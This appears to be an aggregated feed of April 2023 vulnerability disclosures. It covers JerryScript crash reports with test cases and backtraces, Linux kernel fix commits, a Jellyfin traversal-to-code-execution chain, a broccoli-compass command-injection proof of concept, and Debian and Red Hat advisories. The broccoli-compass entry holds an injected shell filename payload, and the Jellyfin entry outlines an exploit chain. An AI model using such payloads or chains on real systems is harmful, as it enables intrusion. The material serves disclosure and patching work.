Jerryscript commit 1a2c047 was discovered to contain a stack overflow via the component ecma_op_function_construct at /operations/ecma-function-object.c.

**JerryScript revision**

1a2c047

**Build platform**

Name the build platform. E.g., copy the output of  
Ubuntu Lunar Lobster (development branch) (Linux 5.15.0-67-generic x86\_64)

**Build steps**

python3 tools/build.py --builddir=asan --compile-flag=-fno-omit-frame-pointer --compile-flag=-fsanitize=address  --compile-flag=-fno-optimize-sibling-calls --compile-flag=-g --strip=OFF

**Test case**

function f0(a1, a2, ...a3) {
class C4 extends a1 {
}
var v5 \= new C4(C4);
return C4;
}
f0(f0);

**Execution steps**

    ./build/bin/jerry  test.js
    

**Output**

segmentfault

**Backtrace**

\==51694==ERROR: AddressSanitizer: stack-overflow on address 0x7ffe6695efc0 (pc 0x5556250c8272 bp 0x7ffe6695f070 sp 0x7ffe6695efb0 T0)  
#0 0x5556250c8272 in ecma\_op\_function\_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1704  
#1 0x5556250c8958 in ecma\_op\_function\_construct\_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631  
#2 0x5556250c8958 in ecma\_op\_function\_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727  
#3 0x5556250c8958 in ecma\_op\_function\_construct\_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631  
...  
...  
#491 0x5556250c8958 in ecma\_op\_function\_construct\_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631  
#492 0x5556250c8958 in ecma\_op\_function\_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727  
#493 0x5556250c8958 in ecma\_op\_function\_construct\_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631  
#494 0x5556250c8958 in ecma\_op\_function\_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727  
#495 0x5556250c8958 in ecma\_op\_function\_construct\_constructor /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1631  
#496 0x5556250c8958 in ecma\_op\_function\_construct /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1727

SUMMARY: AddressSanitizer: stack-overflow /home/zxw/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1704 in ecma\_op\_function\_construct  
\==51694==ABORTING

CVE-2023-30410: jerry crashed while running the following code. · Issue #5052 · jerryscript-project/jerryscript

Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component ecma_find_named_property at /base/ecma-helpers.c.

**JerryScript revision**

1a2c047

**Build platform**

Ubuntu 20.04.2 LTS (Linux 5.15.0-67-generic x86\_64)

**Build steps**

Describe how to build JerryScript. Give all the necessary details of the build  
(e.g., environment variables, command(s), profile, command line options, etc.).

E.g.:

tools/build.py --compile-flag=-fsanitize=address --compile-flag=-g

**Build log****Test case**

function i(a,b\=eval()){eval()}
i(i("a"),eval("var a")) 

**Execution platform**

same as the build platform.

**Execution steps**

build/bin/jerry testcase.js

**Output**

Segmentation fault (core dumped)

**Backtrace**

\=================================================================  
\==167385==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x562a05bd8581 bp 0x7fffdc027800 sp 0x7fffdc027790 T0)  
\==167385==The signal is caused by a READ memory access.  
\==167385==Hint: address points to the zero page.  
#0 0x562a05bd8580 (/data/jerryscript/asan/bin/jerry+0xd0580)  
#1 0x562a05b8051c (/data/jerryscript/asan/bin/jerry+0x7851c)  
#2 0x562a05b9069f (/data/jerryscript/asan/bin/jerry+0x8869f)  
#3 0x562a05b919b9 (/data/jerryscript/asan/bin/jerry+0x899b9)  
#4 0x562a05b6b6d8 (/data/jerryscript/asan/bin/jerry+0x636d8)  
#5 0x562a05bc14cd (/data/jerryscript/asan/bin/jerry+0xb94cd)  
#6 0x562a05bc696a (/data/jerryscript/asan/bin/jerry+0xbe96a)  
#7 0x562a05b9085b (/data/jerryscript/asan/bin/jerry+0x8885b)  
#8 0x562a05b919b9 (/data/jerryscript/asan/bin/jerry+0x899b9)  
#9 0x562a05bf8576 (/data/jerryscript/asan/bin/jerry+0xf0576)  
#10 0x562a05b25dac (/data/jerryscript/asan/bin/jerry+0x1ddac)  
#11 0x7f32bb095082 in \_\_libc\_start\_main ../csu/libc-start.c:308  
#12 0x562a05b26cfd (/data/jerryscript/asan/bin/jerry+0x1ecfd)

AddressSanitizer can not provide additional info.  
SUMMARY: AddressSanitizer: SEGV (/data/jerryscript/asan/bin/jerry+0xd0580)  
\==167385==ABORTING

**Expected behavior**

CVE-2023-30406: Segmentation fault in jerry · Issue #5058 · jerryscript-project/jerryscript

Jerryscript commit 1a2c047 was discovered to contain a segmentation violation via the component build/bin/jerry.

First of all, when reporting a bug, give the issue a descriptive title.

In the body of the issue, optionally give a free-form text description of the  
bug. Give the context necessary for others to understand the problem.

Then, provide information necessary to reproduce the bug.  
Omit sections that are irrelevant for the bug report, but note that information  
like git revision, build platform, build command, and test case are required in  
almost all cases.

**JerryScript revision**

1a2c047

**Build platform**

Ubuntu 20.04.2 LTS (Linux 5.15.0-67-generic x86\_64)

**Build steps**

./tools/build.py

**Test case**

    var p = new Promise(function(resolve,reject){})
    var f = async(p) =>{}
    
    await p;
    
    f(p).then(function(){})
    

**Execution platform**

same as the build platform.

**Execution steps**

build/bin/jerry testcase.js

**Output**

Sometimes throws syntax errors: Unhandled exception: SyntaxError  
Most of the time jerry crashes: Segmentation fault (core dumped)

**Backtrace****Expected behavior**

not to crash

CVE-2023-30408: Segmentation fault in jerry  · Issue #5057 · jerryscript-project/jerryscript

A race condition was found in the Linux kernel's RxRPC network protocol, within the processing of RxRPC bundles. This issue results from the lack of proper locking when performing operations on an object. This may allow an attacker to escalate privileges and execute arbitrary code in the context of the kernel.

Permalink

Browse files

rxrpc: Fix race between conn bundle lookup and bundle removal \[ZDI-CA…

…N-15975\]

After rxrpc\_unbundle\_conn() has removed a connection from a bundle, it
checks to see if there are any conns with available channels and, if not,
removes and attempts to destroy the bundle.

Whilst it does check after grabbing client\_bundles\_lock that there are no
connections attached, this races with rxrpc\_look\_up\_bundle() retrieving the
bundle, but not attaching a connection for the connection to be attached
later.

There is therefore a window in which the bundle can get destroyed before we
manage to attach a new connection to it.

Fix this by adding an "active" counter to struct rxrpc\_bundle:

 (1) rxrpc\_connect\_call() obtains an active count by prepping/looking up a
     bundle and ditches it before returning.

 (2) If, during rxrpc\_connect\_call(), a connection is added to the bundle,
     this obtains an active count, which is held until the connection is
     discarded.

 (3) rxrpc\_deactivate\_bundle() is created to drop an active count on a
     bundle and destroy it when the active count reaches 0.  The active
     count is checked inside client\_bundles\_lock() to prevent a race with
     rxrpc\_look\_up\_bundle().

 (4) rxrpc\_unbundle\_conn() then calls rxrpc\_deactivate\_bundle().

Fixes: 245500d ("rxrpc: Rewrite the client connection manager")
Reported-by: zdi-disclosures@trendmicro.com # ZDI-CAN-15975
Signed-off-by: David Howells <dhowells@redhat.com>
Tested-by: zdi-disclosures@trendmicro.com
cc: Marc Dionne <marc.dionne@auristor.com>
cc: linux-afs@lists.infradead.org
Signed-off-by: David S. Miller <davem@davemloft.net>

*   Loading branch information

CVE-2023-2006: rxrpc: Fix race between conn bundle lookup and bundle removal [ZDI-CA… · torvalds/linux@3bcd6c7

A flaw was found in the Linux kernel's netdevsim device driver, within the scheduling of events. This issue results from the improper management of a reference count. This may allow an attacker to create a denial of service condition on the system.

Permalink

Browse files

netdevsim: fib: Fix reference count leak on route deletion failure

As part of FIB offload simulation, netdevsim stores IPv4 and IPv6 routes
and holds a reference on FIB info structures that in turn hold a
reference on the associated nexthop device(s).

In the unlikely case where we are unable to allocate memory to process a
route deletion request, netdevsim will not release the reference from
the associated FIB info structure, thereby preventing the associated
nexthop device(s) from ever being removed \[1\].

Fix this by scheduling a work item that will flush netdevsim's FIB table
upon route deletion failure. This will cause netdevsim to release its
reference from all the FIB info structures in its table.

Reported by Lucas Leong of Trend Micro Zero Day Initiative.

Fixes: 0ae3eb7 ("netdevsim: fib: Perform the route programming in a non-atomic context")
Signed-off-by: Ido Schimmel <idosch@nvidia.com>
Reviewed-by: Amit Cohen <amcohen@nvidia.com>
Reviewed-by: David Ahern <dsahern@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>

*   Loading branch information

CVE-2023-2019: netdevsim: fib: Fix reference count leak on route deletion failure · torvalds/linux@180a6a3

Jellyfin is a free-software media system. Versions starting with 10.8.0 and prior to 10.8.10 and prior have a directory traversal vulnerability inside the `ClientLogController`, specifically `/ClientLog/Document`. When combined with a cross-site scripting vulnerability (CVE-2023-30627), this can result in file write and arbitrary code execution. Version 10.8.10 has a patch for this issue. There are no known workarounds.

**Impact**

Frederic Linn (@FredericLinn) has reported a series of vulnerabilities that can result in directory traversal, file write, and potential remote code execution on Jellyfin instances. The general process involves chaining several exploits including a stored XSS vulnerability and can be used by an unprivileged user.

The general process is (using the example of setting an intro video as the payload):

*   Create a session as a low-priviledged user with a crafted authorization header
*   Upload an executable that contains a malicious plugin inline via /ClientLog/Document
*   (Admin hovers over our device in dashboard -> XSS payload gets triggered)
*   XSS Payload tries to set encoder path to our uploaded "log" file via /System/MediaEncoder/Path
*   The request fails, but in the process our executable actually runs (I guess for verifying if the path points to a valid ffmpeg version)
*   The executable will create a plugin folder and place the inlined plugin DLL inside it
*   The XSS payload shuts down the server via /System/Shutdown (separate CVE in jellyfin-web)
*   After (manually) starting the server, the plugin gets loaded and will:
    *   write a new video into the Jellyfin temp folder and register it
    *   register this video as the new intro
    *   and finally provide a malicious endpoint that simply executes system commands and sends back the results

The ability to write arbitrary content to log files was added in #5918 to allow flexibility to client logging.

The following two sections detail Frederic's exact determinations regarding the two vulnerabilities.

**Directory traversal and file write**

I've been reading the codebase here and there for a couple of days and found a directory traversal inside the ClientLogController, specifically /ClientLog/Document.

The GetRequestInformation method retrieves the name and version of the client from the HttpContext.User object.

Those values are attacker controlled when authenticating against the API. Both values are interpolated into a string, which ultimately ends up as an argument to Path.Combine().

Setting a client name to the relative path "........\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\test" will write a file with completely attacker controlled content to the executing user's autostart directory.

However, because the attacker only partially controls the filename, exploitation proves to be tricky. That's because the resulting file will always end in ".log", which means putting something in the autostart directory is only going to open notepad on startup. I mean, we can at least insult the user :^).

Anyway, the next logical step would be to write into Jellyfin's plugins directory, but the sub-directories there (of which the already existing configurations directory conveniently counts as one!) are only getting scanned for ".dll" files.

This stops an attacker from providing malicious DLLs that implement the correct interfaces in order to be recognized as legitimate plugins.

On Linux, there might be more options. Running as the standard root user inside a container, an attacker could of course write anywhere. There's the very interesting "/etc/cron.d" directory, where an attacker can place cron jobs that get picked up automatically. Those files, however, can't contain a dot. Moreover, inside the container the cronjobs are probably not being executed, as the Jellyfin process should be only one running.

For the stored XSS component, see GHSA-89hp-h43h-r5pq

**Patches**

10.8.10

**Workarounds**

N/A

**References**

N/A

CVE-2023-30626: Directory traversal + file write causing arbitrary code execution

broccoli-compass v0.2.4 was discovered to contain a remote code execution (RCE) vulnerability via the child_process function.

**Vulnerability in broccoli-compass**

This report details an ACI vulnerability affecting broccoli-compass@0.2.4.

**Package source**

*   https://www.npmjs.com/broccoli-compass
*   https://github.com/g13013/broccoli-compass

**Package description**

"Sass-compass plugin for Broccoli"

**Vulnerability Overview**

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 \[1\]).

If an attacker-controlled filename is included in the list of files passed to "broccoli-compass" via its "files" option, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.

This vulnerability is due to use of the child_process exec function without input sanitization. The Node.js API documentation states that unsanitized user input should never be passed to exec \[2\].

\[1\] https://cwe.mitre.org/data/definitions/77.html

\[2\] https://nodejs.org/api/child\_process.html#child\_process\_child\_process\_exec\_command\_options\_callback

**Reproduction**

A filename that contains a bash exploit payload must be provided in the list of files that "broccoli-compass" accepts as an argument. This can occur if another Node.js application includes "broccoli-compass" as a dependency and allows user-influenced filenames to reach the files list passed to "broccoli-compass".

The proof-of-concept (PoC) program below illustrates the issue. Executing this code will cause the command touch success to be executed, leading to the creation of a file called success.

var compileSass \= require('broccoli-compass');
var user\_provided\_filename \= '$(touch success);#';
compileSass({}, {
    'files': \[user\_provided\_filename\]
}).write('.', '.');

Environment: Node.js v15.5.1 on Linux

Steps to reproduce:

1.  npm i broccoli-compass@0.2.4
2.  Create a file, e.g., poc0.js, containing the PoC code.
3.  Execute the file: node poc0.js

A file called success will be created as a result of the execution of the PoC.

CVE-2023-27848: Vulnerability-Reports/report.md at 9d65add2bca71ed6d6b2e281ee6790a12504ff8e · omnitaint/Vulnerability-Reports

Debian Linux Security Advisory 5393-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5393-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 22, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2133 CVE-2023-2134 CVE-2023-2135 CVE-2023-2136                  CVE-2023-2137Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 112.0.5615.138-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmREBtkACgkQEMKTtsN8TjZHjA//Xt54GrjHMIT1eis48gYiXhfhUxNl1MiA4eeSYFJuidwGLoZbG8AGmT+2OHUvwjOCiJ4RHV06fnpPuftn95Q9Ehz79WkNeeZSIKCuZPeNK6u6c2LZv3enU3ojFejG5y6k/L6kwBx7VUPNnvraZVZcB0zwbL/f9B5wXgAwluxqynyX3vZBPRjTsJATLQs/PMhx7wWVFXspQjIm6+9bVySuNEsIUTIsDNnRlLnSVler3THdcmlHLBVDU1Qb3CIN6bAzDDnJSOUQIHWKIPLSr84ygeT6n0/eeC7qzqJ4WvG7TKhsyXrH1z+XzRdMFajVDrOhYmofmRG4WgyXibcOfi0eR7aEahNVG4aLZlP+hZvKDlDrSJ5kzI8IH4NaXZid9IGZaOXvxKaTOsKaBuC3uHDlWny1aU5MBb/itSeYbXmNVzIip7BJ10wG9rjaQ4d6VEbrMDEEWy5rqP1PUexW5wNDAwNhMHhV2pgPHnDzkC3ScQM6uN4X2vxs58oGMaSsjqjYpR5MOIEoh2SnNdz4NDXxjP8+bdpOu7MOIh4nYBC/zcWf84DgeMq1tv3RR2LDXfwdMZyxlZc7thPvtZhXfUsDJRX38LD0S0B4JR1ERRqYerpj3ixAuOk6OyyJA0CcdiI1Yave1rFGzjzitxYkpgYG+uRYa/GWgDOuG1Ebbk6R2cE==vqQn-----END PGP SIGNATURE-----

Debian Security Advisory 5393-1

Debian Linux Security Advisory 5392-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5392-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
April 22, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-0547 CVE-2023-1945 CVE-2023-28427 CVE-2023-29479   
                 CVE-2023-29533 CVE-2023-29535 CVE-2023-29536 CVE-2023-29539   
                 CVE-2023-29541 CVE-2023-29548 CVE-2023-29550

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the stable distribution (bullseye), these problems have been fixed in  
version 1:102.10.0-1~deb11u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmREBsEACgkQEMKTtsN8  
TjZX4w/+OuttNpDWu8m7daY/USfgb3U7pVI+wbMrqMKxSjQ6BRCUaCcXN1VXZpXn  
cOGTqSoFB+qBgYrSjJ0buH9L1yWAQXfaw43wF9eDAfRZB1Svzhl+W164GGks1YKZ  
9WbJ255lvCuXuNbmP+I1xYtuN5epP1saNAET/3HDkJUbXre5T3wdGCjgJnfyE6vf  
JhAwqVYEbOabRisnEhkP67yHk6mEz2QzH+KbbxyS7hCHp+I4RIMNhxPeoPb2Mn/t  
3oja8bC1WGpJaOaQy99UlCD11L8li30LbVb95V8l91tVzbXJwfOCmdjdRp+8/xA/  
fSpNdjCa7rbX8FWeU/FNunia/KkkJgc3qa65+e0muq99gdBk/+1HrrysjZt2oya5  
/vOMLjDfRmfqyB2fn65Isl2PhJnJN9EtPXeEFGLGNmRfqVlg2w4qXm2UUGDPmeuF  
rQrsYJ7YLLfQp7JejtNbPZbH+csEXFn2DRVv9YdOX5/H+a/boqe0h+9Wtmywzfw1  
uH+A5iY5JyLhknMyzfopCfpZIcV4ieRxeOdKvkUom67zKr2OAigSGxpz7EFdnunn  
gITqkbFqHtdjcCq/Vuj+vlfcUP7iLrWNSR9FZc9k9QcN0kaot8CqUmXF4zjkH/le  
sZMm+pcds9XpShSb3SXatKj3YY/O+DbHEcuKFSjg6DSHwEz4GLI=  
=tV7a  
-----END PGP SIGNATURE-----

Debian Security Advisory 5392-1

Red Hat Security Advisory 2023-1931-01 - GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language, and the capability to read e-mail and news. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: emacs security update  
Advisory ID:       RHSA-2023:1931-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1931  
Issue date:        2023-04-24  
CVE Names:         CVE-2023-28617   
=====================================================================

1. Summary:

An update for emacs is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - noarch

3. Description:

GNU Emacs is a powerful, customizable, self-documenting text editor. It  
provides special code editing features, a scripting language (elisp), and  
the capability to read e-mail and news.

Security Fix(es):

* emacs: command injection vulnerability in org-mode (CVE-2023-28617)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180544 - CVE-2023-28617 emacs: command injection vulnerability in org-mode

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

aarch64:  
emacs-26.1-7.el8_6.1.aarch64.rpm  
emacs-common-26.1-7.el8_6.1.aarch64.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.aarch64.rpm  
emacs-debuginfo-26.1-7.el8_6.1.aarch64.rpm  
emacs-debugsource-26.1-7.el8_6.1.aarch64.rpm  
emacs-lucid-26.1-7.el8_6.1.aarch64.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.aarch64.rpm  
emacs-nox-26.1-7.el8_6.1.aarch64.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.aarch64.rpm

noarch:  
emacs-terminal-26.1-7.el8_6.1.noarch.rpm

ppc64le:  
emacs-26.1-7.el8_6.1.ppc64le.rpm  
emacs-common-26.1-7.el8_6.1.ppc64le.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.ppc64le.rpm  
emacs-debuginfo-26.1-7.el8_6.1.ppc64le.rpm  
emacs-debugsource-26.1-7.el8_6.1.ppc64le.rpm  
emacs-lucid-26.1-7.el8_6.1.ppc64le.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.ppc64le.rpm  
emacs-nox-26.1-7.el8_6.1.ppc64le.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.ppc64le.rpm

s390x:  
emacs-26.1-7.el8_6.1.s390x.rpm  
emacs-common-26.1-7.el8_6.1.s390x.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.s390x.rpm  
emacs-debuginfo-26.1-7.el8_6.1.s390x.rpm  
emacs-debugsource-26.1-7.el8_6.1.s390x.rpm  
emacs-lucid-26.1-7.el8_6.1.s390x.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.s390x.rpm  
emacs-nox-26.1-7.el8_6.1.s390x.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.s390x.rpm

x86_64:  
emacs-26.1-7.el8_6.1.x86_64.rpm  
emacs-common-26.1-7.el8_6.1.x86_64.rpm  
emacs-common-debuginfo-26.1-7.el8_6.1.x86_64.rpm  
emacs-debuginfo-26.1-7.el8_6.1.x86_64.rpm  
emacs-debugsource-26.1-7.el8_6.1.x86_64.rpm  
emacs-lucid-26.1-7.el8_6.1.x86_64.rpm  
emacs-lucid-debuginfo-26.1-7.el8_6.1.x86_64.rpm  
emacs-nox-26.1-7.el8_6.1.x86_64.rpm  
emacs-nox-debuginfo-26.1-7.el8_6.1.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
emacs-26.1-7.el8_6.1.src.rpm

noarch:  
emacs-filesystem-26.1-7.el8_6.1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28617  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEYnQtzjgjWX9erEAQjH3w//bWrgMmx4RYmB43o0HZrDlzViBA9LdE7v  
INgXKCdUkzbfl8YflwRIijqn0ENNvUUHeluGwfFQiPmH5mwVpFhvSoLkoyQXBVHx  
i2Z3r6EGhGrMFYZ8FOj24bZNZZkqqRrYPcFymPTQPE/soAMOERVsGdy/nLATcvpO  
I/NblcjcNqWe1VepT3V1i5gwlWOa22OfnJUh9e05LSWkVg/9Gxl2AVcTN9Y2s1jw  
9tg7nJZA/bs2sDbbLawjxPLoNszJlxZAZlITRXVCKGrvutnhqTxFGWOx4fvnQWEa  
3xLz4nLGCr+sXyHu6Q4mjLEK40b74daY80roFfk++fuDuo5dZQIvh/J04tp9oTh2  
1TEBD8INRSC+dEBiDB4ZfuwQvX1C5zn8aFFURluuXFNILsnWbC5crNdtetw75JCS  
4UnRiJnp07XI+Y9ASlf+tIP+r9zqny5KRzrpCTKL+GZ1XzQczkLdP3n2TrMQx2/I  
M9/WFo7ASfLOxsRobk3ddPJd5iGoxyzA4SnU6Cq5utmF8Xl08ZXDCLtXx+GorDH6  
QZdDvUxLUX+PewJZqEmw6R7MfEamt9ORePcsnA/Yemt7tSjSJy8+AI0T/WdHfLHd  
7hqgcbbb/kWyNFWiXEA9td+pkyhphuDDw7x/QDdKHgHJXK23NQvDpmTxg8OH3zGO  
i7gZUc/hfDI=  
=7r7b  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#linux